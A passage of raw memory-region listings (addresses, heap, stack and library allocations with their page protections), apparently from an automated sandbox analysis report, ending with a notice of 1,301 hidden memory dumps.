stack
page read and write
279AEE2B000
heap
page read and write
279AEF3E000
heap
page read and write
2324000
heap
page read and write
4BAE000
stack
page read and write
22FC000
stack
page read and write
7E0000
unkown
page read and write
279AEE43000
heap
page read and write
4FC000
stack
page read and write
1BF5C4AA000
heap
page read and write
2190000
heap
page read and write
279AF0AC000
heap
page read and write
24A80858000
trusted library allocation
page read and write
6D8737E000
stack
page read and write
7F0000
heap
page read and write
524000
heap
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
600000
heap
page read and write
CA1000
heap
page read and write
96E0000
direct allocation
page execute and read and write
C80000
unkown
page readonly
613000
heap
page read and write
35EC000
heap
page read and write
6D8747E000
stack
page read and write
C81000
unkown
page readonly
279ACF10000
heap
page read and write
8920000
trusted library allocation
page read and write
CA1000
heap
page read and write
7FFD9B950000
trusted library allocation
page read and write
7AC0000
heap
page read and write
1BF5C4B0000
heap
page read and write
4FF1000
trusted library allocation
page read and write
6E15000
heap
page read and write
60A000
heap
page read and write
2C40000
heap
page read and write
6E00000
heap
page read and write
279AEF7E000
heap
page read and write
CA1000
heap
page read and write
7FFD9BA70000
trusted library allocation
page read and write
7B95000
heap
page read and write
23774359000
heap
page read and write
CA1000
heap
page read and write
6D8777E000
stack
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
77F0000
heap
page read and write
4E30000
trusted library allocation
page read and write
1BF5C3C1000
system
page execute and read and write
4853000
unclassified section
page read and write
7930000
trusted library allocation
page read and write
4D8B000
stack
page read and write
There are 1301 hidden memdumps, click here to show them.